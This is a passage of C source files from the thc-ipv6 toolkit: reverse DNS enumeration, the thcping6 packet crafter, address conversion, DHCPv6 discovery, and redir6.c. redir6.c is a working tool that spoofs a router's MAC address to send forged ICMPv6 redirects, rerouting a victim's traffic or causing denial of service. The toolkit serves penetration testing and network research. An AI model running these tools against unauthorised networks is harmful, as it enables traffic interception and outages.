exit(-1); } else usleep(5); } } //recveive and process replies wait = 1; alarm(waittime); while(ok == 0 && wait == 1) { if ((len = recv(sock, buf2, sizeof(buf2), 0)) > 70 && buf2[1] == cnt) { i = (buf2[0] & 15); if ((buf2[3] & 3) == 0) { if (depth == 31) { r[i] = 3; if (buf2[7] == 1) { found++; strcpy(name, "Found: "); ptr2 = buf2 + 12; i = 0; while (i < 32 && *ptr2 == 1) { if (i % 2 == 0) j = tochar(ptr2[1]); else dst6[15 - i/2] = (tochar(ptr2[1]) * 16) + j; ptr2 += 2; i++; } strcat(name, thc_ipv62notation(dst6)); strcat(name, " is "); ptr2 = buf2 + 102; while (*ptr2 != 0 && ptr2 + *ptr2 + 1 <= buf2 + len) { clen = *ptr2; nlen = *(ptr2 + clen + 1); *(ptr2 + clen + 1) = 0; strcat(name, ptr2 + 1); strcat(name, "."); *(ptr2 + *ptr2 + 1) = nlen; ptr2 += clen + 1; } if (debug) { strcat(name, " is "); ptr2 = buf2 + 12; while (*ptr2 != 0 && ptr2 + *ptr2 + 1 <= buf2 + len) { clen = *ptr2; nlen = *(ptr2 + clen + 1); *(ptr2 + clen + 1) = 0; strcat(name, ptr2 + 1); strcat(name, "."); *(ptr2 + *ptr2 + 1) = nlen; ptr2 += clen + 1; } } printf("%s\n", name); } } else r[i] = 2; } else r[i] = 1; rs++; } if (rs == 16) ok = 1; } alarm(0); if (ok == 1 || rs == 16) { // all packets received for (i = 0; i < 16; i++) if (r[i] == 2) { range[depth] = tohex(i); deeper(depth + 1); } } else { // packet loss / timeout if (rs < 16) waittime++; if (rs < 11) waittime++; if (rs < 6) waittime++; if (rs < 2) waittime++; if ((rs == 0 && (waittime >= WAITTIME_START + 6)) || waittime > 15) { fprintf(stderr, "Error: DNS Server %s is not answering or not reliable enough anymore!\n", dst); exit(-1); } fprintf(stderr, "Warning: packet loss, increasing response timeout to %d seconds\n", waittime); goto redo; } return rs; } int main(int argc, char *argv[]) { unsigned char *ptr, *ptr2, *dest, range_start = 0;; int i, j, k, ok; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); prg = argv[0]; if (argc < 3) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s dns-server ipv6address\n\n", argv[0]); printf("Performs a fast reverse DNS enumeration and is able to cope with slow servers.\n"); printf("Examples:\n"); printf(" %s dns.test.com 2001:db8:42a8::/48\n", argv[0]); printf(" %s dns.test.com 8.a.2.4.8.b.d.0.1.0.0.2.ip6.arpa\n", argv[0]); exit(0); } if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (strcmp(argv[1], "-d") == 0) { debug = 1; argv++; argc--; } dst = argv[1]; ptr = argv[2]; srand(time(NULL) + getpid()); memset(range, 0, sizeof(range)); memset(buf, 0, sizeof(buf)); memset(buf_start, 0, sizeof(buf_start)); memset(buf_end, 0, sizeof(buf_end)); ok = 1; if ((*ptr != '.') && (index((char*)(uintptr_t)ptr, '.') != NULL) && ((ptr2 = (unsigned char*)(uintptr_t)strcasestr((char*)(uintptr_t)ptr, ".ip6.arpa")) != NULL)) { *ptr2 = 0; for (i = strlen(ptr) - 1; i >= 0 && ok == 1; i--) { if ((ptr[i] >= 'A' && ptr[i] <= 'F') || (ptr[i] >= 'a' && ptr[i] <= 'f') || (ptr[i] >= '0' && ptr[i] <= '9')) { range[range_start++] = (char) tolower(ptr[i]); if (i >= 2) { if (ptr[i - 1] != '.') ok = 0; else i--; } } else ok = 0; } } else if (index(ptr, ':') != NULL && (ptr2 = index(ptr, '/')) != NULL) { *ptr2++ = 0; len = atoi(ptr2); if (len % 4 > 0 || len < 4 || len > 124) { fprintf(stderr, "Error: invalid prefix length, must be a multiple of 4!\n"); exit(-1); } if (len < 48) fprintf(stderr, "Warning: prefix length is smaller than 48, usually this does not work.\n"); if (len % 8 > 0) j = (len / 8) + 1; else j = len / 8; if ((dest = thc_resolve6(ptr)) == NULL) { fprintf(stderr, "Error: %s gives not a valid IPv6 address\n", ptr); exit(-1); } for (i = 0; i < j; i++) { range[i * 2] = tohex(dest[i] / 16); range[i * 2 + 1] = tohex(dest[i] % 16); } range_start = len / 4; } else ok = 0; if (ok == 0) { fprintf(stderr, "Error: invalid IPv6 address specified: %s\n", argv[2]); exit(-1); } memset(buf_start, 0, sizeof(buf_start)); memset(buf_end, 0, sizeof(buf_end)); buf_start[2] = 1; buf_start[5] = 1; memcpy(buf, buf_start, sizeof(buf_start)); buf[12] = 1; buf_end[0] = 3; strcpy(buf_end + 1, "ip6"); buf_end[4] = 4; strcpy(buf_end + 5, "arpa"); buf_end[11] = 0x0c; buf_end[13] = 1; signal(SIGALRM, ignore); printf("Starting DNS reverse enumeration of %s on server %s\n", ptr, dst); // first: wildcard check ok = 0; k = 0; sock = dnssocket(dst); for (j = 0; j < 5; j++) { for (i = range_start; i < 32; i++) range[i] = tohex(rand() % 16); switch(send_range()) { case 0: ok++; break; case -1: k++; break; default: i = 0; // ignored } } if (ok > 2) { fprintf(stderr, "Error: Wildcard configured in DNS server, not possible to enumerate!\n"); return -1; } if (k == 5) { fprintf(stderr, "Error: DNS server %s sent no replies!\n", dst); return -1; } else if (k > 0) waittime += 2; // starting the search i = deeper(range_start); printf("Found %d entr%s.\n", found, found == 1 ? "y" : "ies"); if (found == 0) return 1; else return 0; } thc-ipv6-2.5/thcping6.c0000644000000000000000000003743112251022441013405 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" struct timespec ts, ts2; int dlen = 8, port = 0, done = 0, resp_type = -1, type = NXT_ICMP6; extern int do_pppoe; extern int do_hdr_off; extern int do_6in4; extern int do_hdr_vlan; void help(char *prg, int help) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-af] [-H t:l:v] [-D t:l:v] [-F dst] [-t ttl] [-c class] [-l label] [-d size] [-S port|-U port|-T type -C code] interface src6 dst6 [srcmac [dstmac [data]]]\n\n", prg); printf("Options:\n"); if (help) { printf(" -a add a hop-by-hop header with router alert option.\n"); printf(" -q add a hop-by-hop header with quickstart option.\n"); printf(" -E send as ethertype IPv4\n"); printf(" -H t:l:v add a hop-by-hop header with special content\n"); printf(" -D t:l:v add a destination header with special content\n"); printf(" -D \"xxx\" add a large destination header which fragments the packet\n"); printf(" -f add a one-shot fragementation header\n"); printf(" -F ipv6address use source routing to this final destination\n"); printf(" -t ttl specify TTL (default: 255)\n"); printf(" -c class specify a class (0-4095)\n"); printf(" -l label specify a label (0-1048575)\n"); printf(" -d data_size define the size of the ping data buffer\n"); } printf(" -T number ICMPv6 type to send (default: 128 = ping)\n"); printf(" -C number ICMPv6 code to send (default: 0)\n"); printf(" -S port use a TCP SYN packet on the defined port instead of ping\n"); printf(" -U port use a UDP packet on the defined port instead of ping\n"); printf(" -n count how often to send the packet (default: 1)\n"); if (help) { printf("t:l:v syntax: type:length:value, value is in hex, e.g. 1:2:0eab\n"); } else { printf(" -h show more command line options (help!)\n"); } printf("You can put an \"x\" into src6, srcmac and dstmac for an automatic value.\n"); printf("\nCraft a ICMPv6/TCP/UDP packet with special IPv6 or EH header options.\n"); printf("Returns -1 on error or no reply, 0 on normal reply or 1 on error reply.\n"); exit(-1); } void alarming() { if (done == 0) printf("No packet received, terminating.\n"); exit(resp_type); } void check_packets(u_char *pingdata, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen - 14, min = 0, ok = 0, nxt = 6, offset = 0; long usec; unsigned int mtu = 0; unsigned char *ptr = (unsigned char *) (data + 14), *frag = ""; if (do_hdr_size) { ptr = (unsigned char*) (data + do_hdr_size); len = (header->caplen - do_hdr_size); if ((ptr[0] & 240) != 0x60) return; } clock_gettime(CLOCK_REALTIME, &ts2); if (ts2.tv_nsec < ts.tv_nsec) { min = 1; usec = (int) ((1000000000 - ts.tv_nsec + ts2.tv_nsec) / 1000000); // usec = (int) ((1000000000 - ts.tv_nsec + ts2.tv_nsec) / 10000); } else usec = (unsigned long int) ((ts2.tv_nsec - ts.tv_nsec) / 1000000); // usec = (int) ((ts2.tv_nsec - ts.tv_nsec) / 10000); if (ptr[nxt] == NXT_FRAG) { offset += 8; nxt = 40; frag = " (fragmented)"; } if (ptr[nxt] == NXT_ICMP6) { if (len < 44 + offset || ((len + 44 + offset) < dlen && dlen < 1000) || (len + offset < 986 && dlen > 900)) { if (debug) printf("ignoring too short packet\n"); return; } if (dlen < 1000) { if (memcmp(pingdata, ptr + len - dlen, dlen) == 0) ok = 1; } else { if (memcmp(pingdata, ptr + 256 + offset, 100) == 0 || memcmp(pingdata, ptr + 260, 100) == 0 || memcmp(pingdata, ptr + 242, 100) == 0 || memcmp(pingdata, data + 260 + offset, 100) == 0) ok = 1; } if (ok) { printf("%04u.%03ld \t", (int) (ts2.tv_sec - ts.tv_sec - min), usec); switch (ptr[40 + offset]) { case ICMP6_PINGREPLY: printf("pong"); resp_type = 0; break; case ICMP6_PARAMPROB: printf("icmp parameter problem type %d", ptr[41 + offset]); resp_type = 1; break; case ICMP6_REDIR: printf("icmp redirect"); break; case ICMP6_UNREACH: printf("icmp unreachable type %d", ptr[41 + offset]); resp_type = 1; break; case ICMP6_TOOBIG: mtu = (ptr[44 + offset] << 24) + (ptr[45 + offset] << 16) + (ptr[46 + offset] << 8) + ptr[47 + offset]; printf("icmp too big (max mtu: %d)", mtu); resp_type = 1; break; case ICMP6_TTLEXEED: printf("icmp ttl exceeded"); resp_type = 1; break; // default: // ignored //printf("icmp6 %d:%d", ptr[40 + offset], ptr[41 + offset]); //resp_type = 1; } } else printf("(ignoring icmp6 packet with different contents (proto %d, type %d, code %d)) ", ptr[nxt], ptr[40 + offset], ptr[41 + offset]); } else { if (type == NXT_TCP) { printf("%04u.%04ld \ttcp-", (int) (ts2.tv_sec - ts.tv_sec - min), usec); switch((ptr[53 + offset] % 8)) { case 2: if (ptr[53 + offset] >= TCP_ACK) { printf("syn-ack"); resp_type = 0; } else { printf("syn (double?)"); resp_type = 1; } break; case 4: printf("rst"); resp_type = 1; break; default: printf("illegal"); resp_type = 1; break; } } else printf("%04u.%04ld \tudp", (int) (ts2.tv_sec - ts.tv_sec - min), usec); } printf("%s packet received from %s\n", frag, thc_ipv62notation(ptr + 8)); if (done == 0 && resp_type >= 0) { alarm(2); done = 1; } } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[2096] = "thcping6", *routers[2], buf2[1300]; unsigned char *src6 = NULL, *dst6 = NULL, smac[16] = "", dmac[16] = "", *srcmac = smac, *dstmac = dmac; char string[255] = "ip6 and dst ", *interface, *d_opt = NULL, *h_opt = NULL, *oo, *ol, *ov; int pkt1_len = 0, flags = 0, frag = 0, alert = 0, quick = 0, route = 0, ttl = 255, label = 0, class = 0, i, j, k, ether = 0, xl = 0, frag_type = NXT_DST, offset = 14, count = 1, icmptype = ICMP6_PINGREQUEST, icmpcode = 0; pcap_t *p; thc_ipv6_hdr *hdr; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc > 1 && strncmp(argv[1], "-h", 2) == 0) help(argv[0], 1); if (argc < 3) help(argv[0], 0); memset(buf, 0, sizeof(buf)); while ((i = getopt(argc, argv, "aqfd:D:H:F:t:c:l:S:U:EXn:T:C:")) >= 0) { switch (i) { case 'T': icmptype = atoi(optarg); break; case 'C': icmpcode = atoi(optarg); break; case 'X': debug = 1; break; case 'a': alert = 1; break; case 'q': quick = 1; break; case 'f': frag++; break; case 'E': ether = 1; break; case 'F': route = 1; if ((routers[0] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", optarg); exit(-1); } routers[1] = NULL; break; case 'S': port = atoi(optarg); type = NXT_TCP; break; case 'U': port = atoi(optarg); type = NXT_UDP; break; case 'D': d_opt = optarg; break; case 'H': h_opt = optarg; break; case 't': ttl = atoi(optarg); break; case 'c': class = atoi(optarg); break; case 'l': label = atoi(optarg); break; case 'n': count = atoi(optarg); break; case 'd': dlen = atoi(optarg); if (dlen > 2096) dlen = 2096; for (j = 0; j < (dlen / 8); j++) memcpy(buf + j * 8, "thcping6", 8); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0], 0); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) { dst6 = thc_resolve6(argv[optind + 1]); if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } } else { dst6 = thc_resolve6(argv[optind + 2]); if (strcmp(argv[optind + 1], "x") != 0) src6 = thc_resolve6(argv[optind + 1]); else if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } } if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc - optind >= 4) { if (strcmp(argv[optind + 3], "x") != 0) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &smac[0], (unsigned int *) &smac[1], (unsigned int *) &smac[2], (unsigned int *) &smac[3], (unsigned int *) &smac[4], (unsigned int *) &smac[5]); else srcmac = NULL; } else srcmac = NULL; if (argc - optind >= 5) { if (strcmp(argv[optind + 4], "x") != 0) sscanf(argv[optind + 4], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); else dstmac = NULL; } else dstmac = NULL; if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, ttl, 0, label, class, 0)) == NULL) return -1; if (alert || quick) { j = 0; memset(buf2, 0, sizeof(buf2)); if (alert) { buf2[0] = 5; buf2[1] = 2; j = 4; } if (quick) { buf2[j] = 38; buf2[j+1] = 6; buf2[j+3] = 255; j += 8; } while ((j + 2) % 8 != 0) j++; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, j) < 0) return -1; frag_type = NXT_HBH; } if (h_opt != NULL) { memset(buf2, 0, sizeof(buf2)); frag_type = NXT_HBH; oo = h_opt; if ((ol = index(oo, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab -> %s\n", h_opt); exit(-1); } *ol++ = 0; if ((ov = index(ol, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab -> %s\n", h_opt); exit(-1); } *ov++ = 0; buf2[0] = (atoi(oo)) % 256; buf2[1] = (atoi(ol)) % 256; if (*ov != 0) for (i = 0; i < strlen(ov) / 2; i++) { if (tolower(ov[i * 2]) >= 'a' && tolower(ov[i * 2]) <= 'f') j = (ov[i * 2] - 'a' + 10) * 16; else if (ov[i * 2] >= '0' && ov[i * 2] <= '9') j = (ov[i * 2] - '0') * 16; else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } if (tolower(ov[i * 2 + 1]) >= 'a' && tolower(ov[i * 2 + 1]) <= 'f') j += (ov[i * 2 + 1] - 'a' + 10); else if (ov[i * 2 + 1] >= '0' && ov[i * 2 + 1] <= '9') j += (ov[i * 2 + 1] - '0'); else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } buf2[2 + i] = j % 256; } if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, 2 + (atoi(ol) % 256)) < 0) return -1; } if (frag) { for (k = 0; k < frag; k++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, getpid() + k) < 0) return -1; if (frag_type == NXT_DST) frag_type = NXT_FRAG; } if (route) { if (thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0) return -1; if (frag_type == NXT_DST) frag_type = NXT_ROUTE; } if (d_opt != NULL) { memset(buf2, 0, sizeof(buf2)); if (d_opt[0] == 'x') { xl = 1; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } else { oo = d_opt; if ((ol = index(oo, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab: %s\n", h_opt); exit(-1); } *ol++ = 0; if ((ov = index(ol, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab: %s\n", h_opt); exit(-1); } *ov++ = 0; buf2[0] = (atoi(oo)) % 256; buf2[1] = (atoi(ol)) % 256; if (*ov != 0) for (i = 0; i < strlen(ov) / 2; i++) { if (tolower(ov[i * 2]) >= 'a' && tolower(ov[i * 2]) <= 'f') j = (ov[i * 2] - 'a' + 10) * 16; else if (ov[i * 2] >= '0' && ov[i * 2] <= '9') j = (ov[i * 2] - '0') * 16; else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } if (tolower(ov[i * 2 + 1]) >= 'a' && tolower(ov[i * 2 + 1]) <= 'f') j += (ov[i * 2 + 1] - 'a' + 10); else if (ov[i * 2 + 1] >= '0' && ov[i * 2 + 1] <= '9') j += (ov[i * 2 + 1] - '0'); else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } buf2[2 + i] = j % 256; } if (thc_add_hdr_dst(pkt1, &pkt1_len, buf2, 2 + (atoi(ol) % 256)) < 0) return -1; } } if (argc - optind >= 6) { if (dlen != 8) { fprintf(stderr, "Warning: the data option is ignored if the -d option is supplied\n"); } else { dlen = strlen(argv[optind + 5]); if (dlen > sizeof(buf)) dlen = sizeof(buf) - 1; memcpy(buf, argv[optind + 5], dlen); buf[dlen] = 0; } } if (port == 0) { if (thc_add_icmp6(pkt1, &pkt1_len, icmptype, icmpcode, flags, (unsigned char *) &buf, dlen, 0) < 0) return -1; } else if (type == NXT_TCP) { if (thc_add_tcp(pkt1, &pkt1_len, port, port, (port << 16) + port, 0, TCP_SYN, 5760, 0, NULL, 0, (unsigned char *) &buf, dlen) < 0) return -1; } else if (thc_add_udp(pkt1, &pkt1_len, port, port, 0, (unsigned char *) &buf, dlen) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } hdr = (thc_ipv6_hdr *) pkt1; if (ether) { if (do_hdr_size) { if (do_pppoe) { hdr->pkt[20 + do_hdr_off] = 0; // PPP protocol value for IPv4 hdr->pkt[21 + do_hdr_off] = 0x21; } else if (do_hdr_vlan && do_6in4 == 0) { hdr->pkt[16] = 8; // ethernet protocol value for IPv4 hdr->pkt[17] = 0; } else fprintf(stderr, "Warning: ether option does not work with 6in4 injection\n"); } else { hdr->pkt[12] = 8; // ethernet protocol value for IPv4 hdr->pkt[13] = 0; } } strcat(string, thc_ipv62notation(src6)); signal(SIGALRM, alarming); alarm(6); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (xl) for (i = 0; i < count; i++) thc_send_as_fragment6(interface, src6, dst6, frag_type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1280); else for (i = 0; i < count; i++) while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0) usleep(1); clock_gettime(CLOCK_REALTIME, &ts); printf("0000.000 \t%s packet sent to %s\n", port == 0 ? "ping" : type == NXT_TCP ? "tcp-syn" : "udp", thc_ipv62notation(dst6)); while (1) { thc_pcap_check(p, (char *) check_packets, buf); } return resp_type; // not reached } thc-ipv6-2.5/redir6.c0000644000000000000000000000642612251022440013055 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip target-ip original-router new-router [new-router-mac] [hop-limit]\n\n", prg); printf("Implant a route into victim-ip, which redirects all traffic to target-ip to\n"); printf("new-ip. You must know the router which would handle the route.\n"); printf("If the new-router-mac does not exist, this results in a DOS.\n"); printf("If the TTL of the target is not 64, then specify this is the last option.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], mac[16] = ""; unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac; thc_ipv6_hdr *ipv6; char *interface; int pkt_len, rawmode = 0, ttl = 64, offset = 14; if (argc < 6 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; src6 = thc_resolve6(argv[2]); target6 = thc_resolve6(argv[3]); oldrouter6 = thc_resolve6(argv[4]); if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]); exit(-1); } if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } if (rawmode == 0) { if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); } if (argc >= 8) ttl = atoi(argv[7]); if (ttl <= 0 || ttl > 255) ttl = 64; memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } usleep(25000); ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); ipv6->pkt[offset + 7] = (unsigned char) ttl; thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14); printf("Sent ICMPv6 redirect for %s\n", argv[3]); free(self6); free(fakemac); return 0; } thc-ipv6-2.5/address6.c0000644000000000000000000001204012251022433013364 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax:\n\t%s mac-address [ipv6-prefix]\n", prg); printf("\t%s ipv4-address [ipv6-prefix]\n", prg); printf("\t%s ipv6-address\n\n", prg); printf("Converts a mac or IPv4 address to an IPv6 address (link local if no prefix is\n"); printf("given as 2nd option) or, when given an IPv6 address, prints the mac or IPv4\n"); printf("address. Prints all possible variations. Returns -1 on errors or the number of\n"); printf("variations found\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *ptr, *dst6, ipv4[16] = "", ipv6[40], *prefix; int i, j, k, found = 0; struct in_addr in; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if ((dst6 = index(argv[1], '/')) != NULL) *dst6 = 0; if ((dst6 = thc_resolve6(argv[1])) != NULL) { // ipv6 address if (dst6[11] == 0xff && dst6[12] == 0xfe) { // EUI-64 encoding of mac printf("%02x:%02x:%02x:%02x:%02x:%02x\n", (dst6[8] ^ 2), dst6[9], dst6[10], dst6[13], dst6[14], dst6[15]); return 1; } if (dst6[8] + dst6[10] + dst6[12] + dst6[14] == 0 && dst6[9] != 0) { // hexdecimal ipv4 j = 0; for (i = 0; i < 4; i++) if (dst6[9 + i*2] > 9) j++; if (j > 0) { sprintf(ipv4, "%d.%d.%d.%d", dst6[9], dst6[11], dst6[13], dst6[15]); if (inet_aton(ipv4, &in) != 0) { printf("%s\n", ipv4); found++; } } } if (dst6[8] + dst6[9] + dst6[10] + dst6[11] == 0 && dst6[12] != 0) { // hexdecimal ipv4 #2 sprintf(ipv4, "%d.%d.%d.%d", dst6[12], dst6[13], dst6[14], dst6[15]); if (inet_aton(ipv4, &in) != 0) { printf("%s\n", ipv4); found++; } } // now try for decimal ipv4 encoding memset(dst6, 0, 8); ptr = thc_ipv62notation(dst6); ptr += 2; j = 0; for (i = 0; i < strlen(ptr); i++) if (ptr[i] > ':') j++; else if (ptr[i] == ':') ptr[i] = '.'; if (j == 0 && inet_aton(ptr, &in) != 0) { j = 0; for (i = 0; i < strlen(ptr); i++) if (ptr[i] == '.') j++; if (j == 3) { printf("%s\n", ptr); found++; } } if (found > 0) return found; fprintf(stderr, "Error: the IPv6 address does not contain a mac or encoded IPv4 address\n"); return -1; } // now check for a prefix argument if (argc == 3) { if ((ptr = index(argv[2], '/')) != NULL) *ptr = 0; if ((prefix = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid prefix: %s\n", argv[2]); return -1; } } else prefix = thc_resolve6("fe80::"); if (index(argv[1], '.') != NULL) { // ipv4 to ipv6 ptr = argv[1]; for (i = 0; i < 4; i++) { if ((dst6 = index(ptr, '.')) != NULL) *dst6 = 0; ipv4[i] = atoi(ptr); if ((i < 3 && dst6 == NULL) || (i == 3 && dst6 != NULL)) { i = 3; ipv4[0] = 0; } else if (dst6 != NULL) ptr = dst6 + 1; } j = 0; k = 0; for (i = 0; i < 4; i++) { if (ipv4[i] > 255) j++; if (ipv4[i] > 9) k = 1; } if (j == 0 && ipv4[0] != 0) { // from here we know its a valid ipv4 address memcpy(ipv6, prefix, 8); memset(ipv6 + 8, 0, 8); for (i = 0; i < 4; i++) ipv6[9 + i*2] = ipv4[i]; printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #1 memset(ipv6 + 8, 0, 4); memcpy(ipv6 + 12, ipv4, 4); printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #2 memset(ipv6 + 8, 0, 7); ipv6[15] = ipv4[3]; printf("%s\n", thc_ipv62notation(ipv6)); // hex representation #3 if (k) { // do we need decimal representation too, or would it be a double? sprintf(ipv6, "::%d:%d:%d:%d", ipv4[0], ipv4[1], ipv4[2], ipv4[3]); dst6 = thc_resolve6(ipv6); memcpy(dst6, prefix, 8); printf("%s\n", thc_ipv62notation(dst6)); } if (ipv4[3] < 10) return (3 + k); else { // 2nd decimal representation sprintf(ipv6, "::%d", ipv4[3]); dst6 = thc_resolve6(ipv6); memcpy(dst6, prefix, 8); printf("%s\n", thc_ipv62notation(dst6)); return (4 + k); } } } if (index(argv[1], ':') != NULL) { // mac to ipv6 sscanf(argv[1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &k, (unsigned int *) &ipv6[9], (unsigned int *) &ipv6[10], (unsigned int *) &ipv6[13], (unsigned int *) &ipv6[14], (unsigned int *) &ipv6[15]); memcpy(ipv6, prefix, 8); ipv6[8] = (k ^ 2); ipv6[11] = 0xff; ipv6[12] = 0xfe; printf("%s\n", thc_ipv62notation(ipv6)); return 1; } fprintf(stderr, "Error: neither a valid mac, IPv4 or IPv6 address\n"); return -1; } thc-ipv6-2.5/dump_dhcp6.c0000644000000000000000000001472612251022434013720 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int counter = 0; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface\n\n", prg); printf("DHCPv6 information tool. Dumps the available servers and their setup.\n"); exit(-1); } void clean_exit(int signo) { printf("\n%d server%s found\n", counter, counter == 1 ? "" : "s"); exit(0); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, rlen, i, j; unsigned char *ptr = (unsigned char *) data, *rdata; char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 }; if (do_hdr_size) { data += do_hdr_size; len -= do_hdr_size; if ((data[0] & 240) != 0x60) return; } else { data += 14; len -= 14; } rlen = len; rdata = (unsigned char *) data; if (len < 126 || data[6] != NXT_UDP || data[48] != 2) return; data += 48; len -= 48; memcpy(mybuf + 1, data + 1, 3); data += 4; len -= 4; /* while (len >= 4) { 